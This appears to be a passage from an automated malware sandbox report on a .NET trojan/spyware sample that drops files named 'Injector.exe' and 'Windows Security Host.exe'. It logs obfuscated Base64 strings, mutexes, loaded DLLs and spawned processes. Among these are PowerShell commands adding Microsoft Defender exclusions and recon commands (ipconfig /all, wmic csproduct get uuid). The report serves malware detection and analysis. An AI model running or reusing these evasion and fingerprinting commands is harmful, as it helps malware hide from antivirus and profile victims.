                    Source: Windows Security Host.exe.0.dr, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.csBase64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: Windows Security Host.exe.0.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csBase64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csBase64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csBase64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: Windows Security Host.exe.0.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csBase64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csBase64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.csBase64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csBase64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csBase64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csBase64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csBase64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
                    Source: Windows Security Host.exe.3.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csBase64 encoded string: 'wZKGOVj0oK1WmVl4RudElUE2v9D7IqxYxEnmez9YUDoQ7O9LgtvAX5KliA4ipu1WzdmQviKu', 'zU1eOvlqjP1DLBOWCorJACQIjNb8U8kFKhcIqEr93EnP9aklUh6ZSdVb454VfiLkHNMr2uoM'
                    Source: Windows Security Host.exe.3.dr, 93i8Zo1wi4ZYxH3roBHmE8c8nVmT2SjfQf7xocVjRTeBtjREsbOy2e7.csBase64 encoded string: 'okwqvIEjQzKOk8BagkPbnWQFTkBMAGI99vUMxgMjLuhYwrr1Z3zBw3tGTQT4c28GDdtmnZta'
                    Source: Windows Security Host.exe.3.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csBase64 encoded string: 'pZRLVthbY0wQ7MSMASEnw0EIpoANL3qKFGi66kNRE4qKrQwuMj7LKFrE2On27oKv0hwf8h9U', 'XyfAXefG0Kk4Pw02K1FuWuZSMRVkT8xQdyWqglkuX0M9gaVRUo0B00TPF8fA3eXfPhhMQCD2'
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csBase64 encoded string: 'Ojt9FItRGmcrbt4UyWSDKUmXQQc9Ea87FtTYM0nIFgzz8zurwnKuoHwd8fiW4fMSJi3Bk14D', 'hYHtNinNtryAVaBm7VytQN6mqPDPPEEWBwXT17rL8PRMrYDamRFaRxE0qLMZfReE9DsmVlHM', 'RpYnm69xc87I9P92i883yZixJQJ1vJChMiErcTDPh0sXIqTpZT81dDSwe5W5VlceAqwAE0gO', 'pe8StOHh4McnflYjwDzL1eFDbJXAXj95bFSzK3YGfpRL0RvqDlqTrkG31uBIJSHe1l0ylSIk'
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csBase64 encoded string: 'IQwbbYCWU67fN3ylVEfx4WsAIien7Bo78YxNt0GVKAKGPjroVxMW0icKP1hGWvvNElWjmtIT', 'mUXndKIpz3CbYv9cyg2rusJmAuZsDmaQhvASpNfaJCs6O6dn69BtBAsAJxriTN5aIqRV0DzU', 'PjHv9JVY4FEZ7U6EU5eJSmsrbjOXhiYYHP0Dm1wUmA4j3XgHfpUn2MTKLtP59GHn5fTU7D2F', 'ymGqTnrDYnOFwSTGYe3iovKTOEiHwJ5xIX9bbtKlFEHki11EirUOMbm1SQM9RLVQq6M6ym4K', 'o29D606xHCUkwCZz9mXstDimkuPMJLqFqhEeihYQODvA2UAaTOlO4LHwpP3cpzdg2mgJ6qu4', 'Q8yVhzT0wPmOXaF5hCoS6zHIcOMiGArL4pcK6NaEmG8EzkJEZU3U4R0HZMCZ4ny9pLDKABKs', 'Kmx5oZZhctj4O6lYf1MpGq2oOYUGhdi5vmv4CRHd96Qj30H0ERhXLwj9JnHh1v7yPg1WBe4g', 'KFZMiAvGOHG1qBkfQiPf6AaTOPcTUi64Lc4itaNSIoX9XsDDQsF39SGsqfI1IuKP9seQzz7x', 'OduhZg7H18ZXTTRN3gxWVeKFmD3tKhUq3NGKpd6FzJtstsC9bQY6weXJtjwbZh2ObbU5Ctag', 'PJNWfbB6lvFvuOygmn43F8C2hNidMlBD6vLG7ExHDht2k8S7pWpAgJPZN0YCo7FFDpUtT0Fu', 'kBx2RCVXH8E2oc2zHDMUcuERHmBGQyRdxnD3nfmf44j6pmRq0ZzbgcRwzrIuenHDOfUUiWoC', 'smFXrVQBmSjiFjJDLFr9boxB3dFjvcORNua4ih4JTPYb61Qx9WQSPSLyPowvq5gJ1DqcOuUk'
                    Source: Windows Security Host.exe.3.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csBase64 encoded string: 'RIY883FdNWmPSXbXulDKaxdYKKDt6HdYrSN9dUjFhtyiMjE2q12cP68Qa7GiTdHwx1PZovA0', 'w1fdelXWbLN39qBod69MGbEAhOxpeOwv9uHGNRoGNDruXgnQmPGjdJ5dlzkFOIcKR4btuQiq', 'jCmTGLMV4M92d6JtW793NnloH7fhXY9zmNeUJewuJJFCPOarS5JLpS3ph3NLu6Bk1vF1RMzk', 'y5ML95ed1njyiry8zxfhvCD57xu3uIdJnlBeC9MiuQLTRrkDNG2lmEp88Iyw88IkmkNrUMiL'
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Windows Security Host.exe.3.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Injector.exe.0.dr, --.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Injector.exe.0.dr, --.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@31/33@5/6
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\8Hd0ZExgJz.exe.logJump to behavior
                    Source: C:\Users\user\Windows Security Host.exeMutant created: NULL
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4064
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeMutant created: \Sessions\1\BaseNamedObjects\6uSr6XBf6oxojH0b
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeMutant created: \Sessions\1\BaseNamedObjects\ObFXXBZjIkSdxNXuV
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeMutant created: \Sessions\1\BaseNamedObjects\BBp4iSYvtWnKX1LZyNnx
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile created: C:\Users\user\AppData\Local\Temp\Injector.exeJump to behavior
                    Source: 8Hd0ZExgJz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 8Hd0ZExgJz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 8Hd0ZExgJz.exeReversingLabs: Detection: 60%
                    Source: unknownProcess created: C:\Users\user\Desktop\8Hd0ZExgJz.exe "C:\Users\user\Desktop\8Hd0ZExgJz.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Injector.exe "C:\Users\user~1\AppData\Local\Temp\Injector.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe"
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4064 -s 2188
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\Windows Security Host.exe "C:\Users\user\Windows Security Host.exe"
                    Source: unknownProcess created: C:\Users\user\Windows Security Host.exe "C:\Users\user\Windows Security Host.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Injector.exe "C:\Users\user~1\AppData\Local\Temp\Injector.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /allJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeSection loaded: fwpuclnt.dllJump to behavior
